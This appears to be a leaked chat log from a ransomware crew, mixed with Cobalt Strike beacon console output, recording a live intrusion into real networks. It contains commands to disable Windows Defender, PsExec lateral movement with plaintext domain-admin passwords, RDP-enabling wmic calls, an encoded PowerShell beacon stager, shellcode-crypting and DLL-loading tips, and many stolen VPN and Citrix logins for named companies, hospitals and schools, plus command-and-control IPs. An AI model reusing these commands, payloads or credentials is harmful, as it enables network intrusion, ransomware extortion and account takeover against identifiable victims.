dir 10/21/2020 21:30:41 Program Files (x86)
dir 10/21/2020 21:30:41 ProgramData
dir 10/21/2020 21:30:40 Projects
dir 10/21/2020 21:30:45 RDL
dir 10/21/2020 21:30:40 Recovery
dir 10/21/2020 21:30:40 SmartSystems
dir 10/21/2020 21:30:40 SQL_Docs
dir 07/11/2014 13:15:08 SSTemp
dir 09/03/2018 21:01:40 System Volume Information
dir 10/21/2020 21:30:45 Users
dir 10/16/2020 13:56:57 Windows
1kb fil 10/21/2020 21:30:40 .rnd.GQQNX
13kb file 10/21/2020 21:30:40 Datacollectors.db.GQQNX
1mb file 10/21/2020 21:30:41 Infor803ERPInstall.log.GQQNX
0b file 11/27/2018 22:17:27 Inventory.db
1kb file 10/21/2020 21:30:41 MAPICSCDInstall.log.GQQNX
680b thread 10/21/2020 21:30:40 mode.txt.GQQNX
21gb file 10/16/2020 18:20:56 pagefile.sys
717b file 10/21/2020 21:30:40 R3ADM3.txt
185kb file 10/21/2020 21:30:27 starter.exe
4kb file 10/21/2020 21:30:40 VSM000.IDX.GQQNX
``тогда делаем дальшеокей-нета трастов нет?и не проверялине стали рисковать)на остальных серваках не запускается что ли тоже по какой-то причине?серверов 20
живы 18
из них 4 - дкв кобевсе притянутысколько тут серверов и вс?такие экземпляры встречаюся и решение собственно выше)а, ну логично)и всевсе его дискиего замапить на сервер где такой штуки нет``
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
ERROR: Access is denied.
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
ERROR: Access is denied.
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
ERROR: Access is denied
``или мы вс вообще можем не трогать?ну ок, на одном серве защищенные ветки походутак если там вл то нигде и не отработаетпод ДА токеном даже маунтить не надо ничего)указываем список путейфлагчерез -p akfuберем просто с серверов под ДА токенома зачем вобще на армах запускать? на серверах если завелось - этого достаточнои там проверяемвыборочно еще 3 арма берем``
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
[+] received output:
The system cannot find the file specified.
Connecting to 10.0.20.222...
Starting PSEXESVC service on 10.0.20.222...
Connecting with PsExec service on 10.0.20.222...
Starting C:\starter.exe on 10.0.20.222...
PsExec could not start C:\starter.exe on 10.0.20.222:
``````
beacon> portscan 10.0.20.222 3389 none
[*] Tasked beacon to scan ports 3389 on 10.0.20.222
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``вроде рдп должно включиться...``
[*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
[Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
[Tasked beacon to run: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
[+] host called home, sent: 472 bytes
[+] received output:
The operation completed successfully.
```не даетто жеnj ;t``
* Username : egl_admin
* Domain : ITC
* Password : E@gle@x1s3030
``просто не хочет подключать на пкбез аккаоставили старый у egl_adminмы меняли праоли ДАа ты под кем7не подключает[ ](https://mediaeveryone.com/group/itc-us-com?msg=eLf3auQNBPDqNABtu) не получилось?если не отработает то стоит wl на армах@user9 а попробуй через псек запустить ехе из корняпробуюghj,e.попробуйте тоже по рдп зайти под даа меня не пускает сюда``
beacon> shell c:\explorer.exe
[*] Tasked beacon to run: c:\explorer.exe
[+] host called home, sent: 46 bytes
[+] received output:
Access is denied.
``щас залечуя тоже думаю что такое естьможет вайтлистинг аппликейнешнов?``
shell starter.exe
[*] Tasked beacon to run: starter.exe
[+] host called home, sent: 42 bytes
[+] received output:
Access is denied.
```
это из корняпробуйте по рдпкая-то херня откровенная``
beacon> shell WINDOWSSystem32.exe
[*] Tasked beacon to run: WINDOWSSystem32.exe
[+] host called home, sent: 50 bytes
[+] received output:
Access is denied.
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
beacon> whoami
[Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt authority\system
```корень С
тест пжлстпапкав ps листе не светится никаких АВпопробуйте корень диска Стоже пишет access deniedпопробуйте другую папкуофнул lockappпричем не удаляет а блочит запускну на серверах мы виндеф батником рубили кста``
beacon> shell dir 1.exe
[*] Tasked beacon to run: dir 1.exe
[+] host called home, sent: 40 bytes
[+] received output:
Volume in drive C is OS
Volume Serial Number is D85B-9A4C
Directory of C:\WINDOWS\System32
10/21/2020 09:02 PM 189,440 1.exe
1 File(s) 189,440 bytes
0 Dir(s) 190,692,196,352 bytes free
``````
beacon> shell 1.exe
[*] Tasked beacon to run: 1.exe
[+] host called home, sent: 36 bytes
[+] received output:
Access is denied.
```занчит его рубит.....вебрутесли виндеф оффну тогда по логикес обычного jump зашелесли залогиниться под домен админом на ДКвроде кстати виндеф оффвот так с рдп поедет хорошо``
For /f "tokens=*" %%a in (c:\tmp\ComputerList.txt) Do psexec \\%a -i gpupdate
``или недодал ему /forceно суть в том что или псек передал ему все параметры после имени програмыя как бы вижу у него там в процессах висити с прямым указаниеми бези под токеномпо разному пробовалиа зачем вобще это все? почему под токеном не запустить?нет?``
shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
```
это же сработалоэто не параметры самого gpupdate?``
gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
``по моему косяк``
gpupdate.exe 12492 Services 0 4,424 K NT AUTHORITY\SYSTEM 0:00:00
``````
beacon> shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 131 bytes
[+] received output:
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
[+] received output:
Connecting to 10.0.20.222...
Starting PSEXESVC service on 10.0.20.222...
Connecting with PsExec service on 10.0.20.222...
Starting gpupdate on 10.0.20.222...
gpupdate started on 10.0.20.222 with process ID 46196.
``блочит запуск10.0.20.222дайте ип арма+авер вебрут и только?но все равно не даетбатник отработал на отключение виндефапробовали на паре армов запустить стартер - не даетлокайте серваки, рабочие станции можно маунтами - там почти никогда нету процесов которые хенлдят важные файлы+ батником прошлись на отключение виндефана серверах вроде как отключилосьи потом дкпотом все остальноепроритет на серверапотому что на клиентских машинах не включены правила фаервола на remote managmentна все машиныshell PsExec \\* -d -s -hошибка тама зачем psexec?это дка почему не с дк гпо обновляете?``
beacon> shell PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 121 bytes
[+] received output:
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Enumerating domain...
A system error has occurred: 2184
``кобальт крашиткоторый жёлтыйтам в интеракт с ITC-DC-SVR01 не входи[ ](https://mediaeveryone.com/group/itc-us-com?msg=qX3zp9exDqEMwuc5q) вот она моя t,exfz вонючаядайте еще доступ в кобу где делайте[ ](https://mediaeveryone.com/group/itc-us-com?msg=2fCSwKCMjzbrqCNBG) даща ток ребутнусьлибо могу еще впнов датьможно сейчас еще посмотреть какие нужно(второй не было(пациентаон же в записке упоминается как идентификатортам в названии "код" билдане, название файла в архивеесли да, то вот
`SDIJ*FHg78SDFGTI&SDtARTE%YET`ты пароль от архива имеешь ввиду?значение похоже вот на это
```
uIYeJR0AY0hM9wCq0pK0S0fSgUFvquxwDi1Ieh3X093RPVdLcow9OB4lOmLDzISp
``парни, а не помните какой тут был код билда локера?угу не видитесли отдает - то не видит в 99 процентах случаесли отдаст результат - значит машина видит ДКможно сделатьshell net group "domain admins" /domмашина не отключена от домена в момент исполнения скрипта этого?`Success! Username: SBolley. Password: thisduckingsucks!02`работаеместь сессиитут у нас на чем затык?user9окк 12предлагаю пораньше и пораньше закончитьЗавтра кокольки?До завтравсем покавсем спасибои идем домойсеси в слипв сессиях за собой удалите файлыsisd.net снят АД. ЛА нет. Ищу где текущий пользак админ в подсетях из subnetsспасибодругое делоУ меня ничего, затра попробую остальные нагрузки и работу через ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` в `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - ошибка при логине в цитрикс
`mch1.org` - нет доступов вобще никуда кроме медицинского приложения, в котором невозможно ввести логин и пароль
`protransport.cloud.com` - доступ есть только к приложению по грузо-перевозке, входные данные к нему не подходят
`unf.edu `- сейчас в работе, сняты адинфо, ДА, ДК, кербы переданы тл2, снят список шар, сейчас проходка по сети и съём мимика+хэшдампане дает подлкючится с ip дедика
```
https://login.medimizer.net/rdweb/pages/en-us/login.aspx
```
ситрикс никуда не ведет кроме админок сайтов, впн тунель на дедике есть но компов в сети не видно
```
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml
```
в работе - о прогрессе писал в конфе
в двцух словах никуда не получилось двинуться, мало пк
сейчас стоит расскан по /16 на 445
```
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com
``oasispetroleum.comничего не запустить, закрыто админом cmd adm psребята, пожалуйста, пишите о каком домене речь и что не так или так и не понял как мне элевейт кит попробовать через ту тулзу, завтра попробую через дэдик всё сделатьтут``
https://paloca.cernerworks.com/citrix/prodweb/ dr14349773
```в первом что не так было?@user3 у меня на тебя 2 доступа записаноУ меня ничего, затра попробую остальные нагрузки и работу через psгде что не пошло и какой прогресSISD.NET - продолжаю `сканю подсетки из сабнетс - ищу ге пользак админ`прям по всемотпиши по всем своим текущим доступам которые бралитак ну чтоя бы для начала все равно снял ад, керб, шарпфайндер. текущий тул позволяет если АВ не сильно кусачийчекну8443 порт ещетолько хотел про него написать)rev_tcp_rc4 очень неплох от мсфаЧекал разные портыrev_tcp
rev_http
rev_https
80/443/53я бы поигрался с листенерами и портамида думаю тут проверить в кобу и в арму 2 нагрузки и можно понять что не тянется)не однократно прокатывало сессии в армитажад инфо выгрузитьнадо было работать в текущих условиях, снять керб и т десли не пустило чистую длл значит блочит именно трафиктак там дело не в нагрузкахПробовал запустить разные нагрузки. Не задалосьдо 11 работаем, в 11 итоги мин на 10 и по домамв 11 сворачиваемсяотпиште в групы что сделалипиши плиз в конфу где проблемы[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) вообщем с моей сессией печально
запускаю какой-нибуль тул - он отрабатывает и сессия отлетаета на других нетзапускал - пишет что на той машине где я есть доступ к админским шарам, но прав у него нет почему тошейрфайндер запускали? проверяли может пользак имет права админа на другие машины просто ?у меня с mgrmedu.com пока нет подвижек
пользак не ла - права не получается поднять
лажу по сети
+ сессии постоянно отлетают - ав рубитпроверил сканнером мс17 единственный живой сервак 2008 - глухо
снял кербы с трастов и передал тл2
думаю чем подниматьсяпытаюсь систему получитькакие результаты у вас?она грязнее чем земля)даlfкобы?нагрузка чего?запускаю `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!` в cmd/ps нагрузку ``powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHEAVABFAHUAUgB1AFAARQAyAFUAcgBWAGcARAB4AEUAZwBTAGcAUABYADcAbQBwAFYAQQB1AHQAUQBYAGsASgBqAFkAaAAzADUAbgArAC8AQgA5AFQAYwB6AEUANQBtAGQANgBwADIAMQB5AHIASwA3AHUAWQA4AGYAKwBmAFIAQgB3AE8AVABHADQAUABFAHIAawAzAFUAMABNAEgAVQB6AFEAVABIAGkAUgBzAEcAMQBHADIAbABjAHMAMgBIAE0AcQBFAGUAcQBLAC8AVgB5AGkAbwBOAGIARgBJAGMARgA0AHUAWABOAFMAWQB2AFUAUgB6AGEATAA4AGgAeABZAHAAdwBrADEASgArAFYAcQB4AEcASwBrAFUALwBWAHIAdgBjAG8AZgB2AEYARABKAC8AVgB3AG4AUwBvADMAQgBTAEYAMgAwAGgAagBUAFYAMQBlAFYAcQAvAEkAbwBEAFIASwAwAHcAaQA4AEIASQB1ADQAZQB2AC8AaQBZAHYASQBaAE8AQQBvAHAAcQBUADIAdwBVADgAYQBHAFAAMwBPAEQANQB5ADUAZABlAEcAcwBjADQASQBLAGQAOQBRADgASwBFAFQAUgBMAHMATAB6ADAAWABKAHoAVwBhACsAawBaAE4AWAAzAEcATQBiAHgANgBYAEcAMgB3AFQANgBrAC8AcQArAHEAVQBoAGUAZQBFAFMAZQBXAGUAeQB2AEkAZgBzAFYAMwBDAEkARABaAHoAaQBuAFIATABhAHEAUABDAGcA
``` Процесс создается, но сессия не прилетаети амси байпас скрипт блочит как малварькак скрипт[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) я пробовал, блочит ави еще, повторяю хз какой раз, удаляйте за собой тулы и любые свои файлы из системыинвок керберостом снимите если рубеус блокиреутпонялдальше уже от тебя зависит как будешь повышать их)у тебя есть весь гитхаб) возможность работы с cmd, загрузкой файлов и т док, а как через эту тулзу повышать привелегии?нет, получается заблочило запуск ехеесли файла нет, то и кербов получается нет, да?когда снимаете керб отсылайте его @tl2 и дублируйте в конфу@user7 в конфу пожалуйста@user9 конфу сделалспасибоготово@user4 продублируй плиз в конфу[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.comя, скинул тл2можно беседуя могу, зальёшь рубиускстатино не скинул ещеясовсем никто?ещё неткто-то снимал кербы?возьми один просто для себяу вас 4 дедика``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
``` вот требует старую весию ситрикца, я ее качаю и при установке мне говорит типа: Это не совсем новая версия? Поставь новей. Если я снесу новую которая стоит то парни не смогут юзатьшелкод в личкуОкновый шелкод билдер у @tl1 естьвот так пускается``
rundll32.exe C:\path\to\file\file.dll,entryPoint
regsvr32.exe /s C:\path\to\file.dll
```вот ФУД``
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep
``````
Делаю криптором raw to exe сессия не прилетает.
```
ехе грязный, не делай его))Открылось...у меня было особщение что сайт не поддерживает tls 2.0или смени дедик на другой чисто проверить доступностьбрось его полностьюсвежий?лисакакой браузер юзаешь?там отображается страницада все окДелаю криптором raw to exe сессия не прилетает.С дедика не от крывает страницу https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx тупо весит белый экранто есть креды невалид?``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
``` С этим соединение не проходита тут?``
phoen1xasp.com
``````
https://paloca.cernerworks.com/citrix/prodweb/ dr14349773
``Не запустить cmd, powerShell, taskmgr все почекано админома то ты тише всех работаешькакой был в работе и почему нужна замена напишидаLfтебе надо?даесть еще что на замену?``
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234
```
@user9 заменадавайнет вебая могу тебе еще в работу дать доступы, там может быстрее работать чем тутчекни что там за вебне густону, так пусканул
```
beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024
[*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]
[+] received output:
172.0.0.188:443
172.0.0.187:443
[+] received output:
Scanner module is complete
``чек веб порты)где-то рядомну хоть что-то там есть``
beacon> portscan 172.0.0.1/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]
[+] received output:
Scanner module is complete
```:ok_hand:на 24 отсканьпо ДНС сабнетупоставь скан /16 от твоего ипестьесть ли ип на интерфейсепроверь через ipconfigда жив вродеон мог отвалитьсявпн жив?и пинг не проходит к тем ip что ip сканер выдал[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) чет не получается никуда двинуться
впн прокинут но в подсети 172.169.16.1-172.169.17.254 портскан ничего не даетвзял фаервол в си руки и заблокировала, окзаблочил рдп коннекта почему он его?касперский его прибилзавелся ваш дедик второйну вот он скорее всего и заблочил вход[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) да, циткрикс не пускал без едр а виндеф было в падлу включать)создал[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) есть сессияу вас каспер стоял на дедике что ли?ок щас руками пересниму[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) нет это текстовый былсразу отпиши полную ситуацию. ось, что сделал, что получилось, что ожидалось, в чем проблемаа щас снял тулчейномперед тем как меня выкинуло - я снимал рукамиесли - это архив?так а я не понял, ты его руками снял или через тулчейн?я еге не докачал - больше 200 метров файл был``
https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207!
```
@user8 заменаиз тулчейна адф вернул 11 юзеров а без тулчейна сколько?может вполнес ним все в порядке? или может косячить?по тулчейну - он вернул в адфайнде 11 юзеров, а я качал файл 238 Мбвообще ничегоникаких шелов нет?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) тут есть только одно приложение и эти креды ему не катятзалетай скорее, бери ад, бери доступы и пролезай в сетькто же так делает)крепить цитру....и запись о персисте из реестра пропалану я на свою кобу персист поставила откуда у тебя дл на закреп?эмми вобще все исчезло, даже dll на закрепда нету там ничегоесть ав или еще чет?страннов апдате у юзераа где ты их оставил?там странно.... я щас через цирту перезашел, заново сессию себе кинул, а никаких моих файлов там уже нет... как так? спали демоны?а, отличновернулсяя уже.а то он уже инфо забиралпустите кто-нибудь @user4 в сетьтак ну ладно, у вас сейчас 3 дедика естьи впн не отключается даже после ребутаскорее всего улетел дедик за впнзначит от порталас прошитым конфигом)ну перейдя по сылке он сам предложил скачатьот портала?установили откуда?там только цитру установили и всё, даже не настраивали еёвпн поставили?я и user 9 на нём работалидедик к которому не подключаетсяа это что?кто последний работал на 199.241.188.186?``
https://protransport.cloud.com/citrix/storeweb/ rtgroup2@proloads.com Blue4586
```
@user8 заменакачал ad infosisd@user4 откуда?@user8 маякни в конфу меня что то сессии отвались(прогресс описал в конфе@user9 @user7 в работечем заняты еще 3 человека?а ты админ?ок, сейчас добавлю пользователю групумб спалили аномалию и убрали группу удаленного доступа`the connection was denied because the user account is not authorized for remote login`
как понять не авторизован для входа ?у кого впн поднялся/есть доступ в сеть?не понял вопросакто еще?@user9 в работелсадмики каких-то сайтов.У меня одна, с цитрикса никуда не пойти
впн включился на новом дедике - буду пробовать смотерть что есть в сети под впномтулчейн на тесты1сколько сетей в работе?``
FH*(UG&$*WFH&*efu
``Что делать далеето есть?Какой план?сейчас выдам тулчейнпонялты имешь ввиду цитрикс ресивер?
просто я тоже как бы подключился но потом дедик улетел@user9 а у тебя в чем проблема? я подключился к впнувин 2012``
206.221.176.24:37345
Administrator:V86Rk1Dd6Ck1yqThbD6Dh8Cg0Z8iLiiY
```горячая заменаотписали в дцпо дедику давсе еще не доступена шо там дедик еще починили?аналоги run?paloca.cernerworks.comзакрыт, пробовал по ehkдомен admin.sisd.k12ну сейчас дэдик заработает и попробую или когда у коллег освободится попробуюрдп?такая же ситуацияУ меня не запустить cmd and powerShell закрыто админом, файл не залить.у тебя конфа какая?потом уже lpe и т док))если забыли: AD INFO, LA, DA, EA, DCнет, все по алгоритмуну я в системе, дальше как обычно? или какие то другие вводные?не понял вопросамы разрабатываем всю сетку, в смысле АД снимать?ну и поока дедик не доступен все ещея залогиненне, я прост чет не понимаю
там все, в этой ссылке, ведет тупо в админки сайтов[ ](https://mediaeveryone.com/channel/general?msg=TPa6bFNG43pgJ65BY) ты тут залогинен? или пользак зашел?```
https://connect.mch1.org/vpn/index.html lpsmpep2 vk2Lazu4
```
@user8 заменаотпиши в конфутутачки@user8 у нас где?окмбщас его ребутнут и притяните его в кобу на всякиймб ушел за впн такитак жено после запуска я в нем поработал минут 10 ещеплагин цитрикса вы на нем впн не запускали случаем?)да, чет он поработает пару минут и потом 15 не доступенпоходу дэдик полность сдох (199.241.188.186)``
https://mydesktop.sisd.net/vpn/index.html jeksae happiness3
```
@user4 заменану цитрикс ресивер что то вроде пробрасывает
а так нетвход в сеть?[ ](https://mediaeveryone.com/channel/general?msg=9uCLqBtxTJHonFyfv) дедик чет отваливается,но
я там полазил - все ведет в админки сайтов`
JE*SG&Y*FwEYHIf7g8we
```+дадокинуть?но там детект рейт вышеесть варик крипта шелкода в ехетолько шелкод в дллнеа?@tl1 есть делка для крипта exe``
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml jgarcia693@aol.com Thebear#1
```
@user9 замена@user3 замена``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
```передай пока дедик @user8видимо акк залогинени после этого из общего списка исчезает аккЕсли делать через прилождение то отдает ```
your changes could not be served due to an invalid configuration of the account PROD
``вызывая через него окошко с приложениемпривет)Привет.ica файл это фай который citrix receiver'ом открываетсяагатебе надо поставить цитрикс ресивер который этот файл будет открыватьУ меня куда не ткни отдает файл ```
[Encoding]
InputEncoding=UTF8
[WFClient]
ProxyFavorIEConnectionSetting=Yes
ProxyTimeout=30000
ProxyType=Auto
ProxyUseFQDN=Off
RemoveICAFile=yes
TransparentKeyPassthrough=Local
TransportReconnectEnabled=Off
Version=2
VirtualCOMPortEmulation=On
[ApplicationServers]
Report Request Maintenance Prod=
[Report Request Maintenance Prod]
Address=;40;STA664590668;2023A7A9232D60230A425A54DEFFA6
AutologonAllowed=ON
BrowserProtocol=HTTPonTCP
CGPSecurityTicket=On
ClearPassword=53F80104235331
ClientAudio=On
DesiredColor=8
DesiredHRES=0
DesiredVRES=0
Domain=\6AA387C7B8517C82
DoNotUseDefaultCSL=On
EncryptionLevelSession=EncRC5-128
FontSmoothingType=0
HDXoverUDP=Off
HTTPBrowserAddress=!
InitialProgram=#Report Request Maintenance Prod
Launcher=WI
LaunchReference=558DD381B14D807B6BEEDE6BACFB10
LocHttpBrowserAddress=!
LogonTicket=53F801042353316AA387C7B8517C82
LogonTicketType=CTXS1
LongCommandLine=
LPWD=156
NRWD=93
ProxyTimeout=30000
ProxyType=Auto
SecureChannelProtocol=Detect
SessionsharingKey=SHNGKRJyAVxk+e5emFlorzKJwYLVSQhb
SFRAllowed=Off
SSLCiphers=all
SSLEnable=On
SSLProxyHost=ag2.cernerworks.com:443
startSCD=1606819909507
Title=Report Request Maintenance Prod
TransportDriver=TCP/IP
TRWD=0
TWIMode=On
WinStationDriver=ICA 3.0
[Compress]
DriverNameWin16=pdcompw.dll
DriverNameWin32=pdcompn.dll
[EncRC5-0]
DriverNameWin16=pdc0w.dll
DriverNameWin32=pdc0n.dll
[EncRC5-128]
DriverNameWin16=pdc128w.dll
DriverNameWin32=pdc128n.dll
[EncRC5-40]
DriverNameWin16=pdc40w.dll
DriverNameWin32=pdc40n.dll
[EncRC5-56]
DriverNameWin16=pdc56w.dll
DriverNameWin32=pdc56n.dll
``все кербы в личку @tl2а, все)или medimizer к user4 относится?``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
```да, я потом изменил сообщение на medimizerтам просто 2 учетки было@user9 ты взял доступ от @user4 у него домен `mysystems4pt.com``https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!`[ ](https://mediaeveryone.com/channel/general?msg=gekDndf3GK77gi9qR) +``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
```забрад https://paloca.cernerworks.com/citrix/prodweb/ dr14349773``
https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent
```создаю конфу добавляю васразбираем и пишем кто забралдоступы валидны5 штук``
https://paloca.cernerworks.com/citrix/prodweb/ dr14349773
``````
https://citrix.sharecare.com/vpn/index.html ad.alex.whittier Ph@nt0m01Beatz87
```а и еще тут будут рдп``
https://login.medimizer.net/rdweb/pages/en-us/login.aspx office@biomedtechs.com Bmt5510shoP
https://login.medimizer.net/rdweb/pages/en-us/login.aspx bill@biomedtechs.com 2003Proline
``````
https://portal.mysystems4pt.com/vpn/index.html PWilliams061 Signal061relent
``````
https://apps.oasispetroleum.com/vpn/index.html bmolinaro b5ab80fbd9E!
``ессесноеще помните как это делается?)разбираем и в работу вас есть 2 дедика для работы с впнами + цитрыиз масштаба работ, я выдаю вам список цитр + впныокей, пока будет в запасекудаДа не, просто никому надоrelfвсе, все пропаликто-то хочет еще одну новую кобу?билдер шелкода``
spidfhoUSDFHI&SEUHFIjoaPS;ddsijghf
```в лс кобау менятак, у кого тогда остался инактив?долго живут однако)можете взять 1 чистую кто хочетзначит 4 рабочихну зайти то зашёланет, если к кобе не коннектит значит инактивправильно?то коба инактивесли у меня сессий активных нетя недопонялтак-си как раз у 2х инактив3 кобы значит рабочиеагаип домена со скобками в гугледав запрос так как ты написал, со скобками23.106.160.86 инфы нетипип домена или ип кобы проверяли?)поэтому щас узнаем сколько у нас есть рабочих коб и распределим текущие 2моя вроде чистаяу меня есть 2 чистые кобыесли есть инфа что ип помечен как кб значит кобу в сносв поиск 123[.]123[.]123засветился ли он как кобаль страйкте у кого коба активная проверьте ип домена в гугле на детектывыдам свежий даКриптор есть?активнаяsimvp.comкто-то один не отписал по кобе)у остальных не было коб?``
likenic.com
104.243.40.126:38542
```
не активу меня `85.150.190.113:61718` активна (она из последних, которые давали)остальные?моя инактив
```
https://ezvol.com
-
209.222.101.55:38350
```Сессии с лабы прилетаютулкит будет ближе к 15:00 свежий билд, его выдаст @tl2, соотв с нас со всех фидбэк по работеraills.comактивн/не активскажите мне ваши старые кобычто по тул киту и по кобам, в плане работаем в старых или новые будут?мин 10 на орг вопросы и потом непосредственно работаНу чтож еще раз всем привет, давненько мы с вами не общалисьтеперь 5)5)всего 4?на месте всеhiЖдем и начинаем)Добрый день:space_invader:привет\Всем добрый день``
Windows IP Configuration
Host Name . . . . . . . . . . . . : UKHECSLT3028
Primary Dns Suffix . . . . . . . : matches.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : matches.com
Home
Ethernet adapter Ethernet:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Intel(R) Ethernet Connection (6) I219-V
Physical Address. . . . . . . . . : E8-D8-D1-F3-F7-7E
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Local Area Connection* 1:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
Physical Address. . . . . . . . . : 60-F2-62-90-AE-62
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Wireless LAN adapter Local Area Connection* 2:
Media State. . . . . . . . . . . : Media disconnected
Connection-specific DNS suffix :
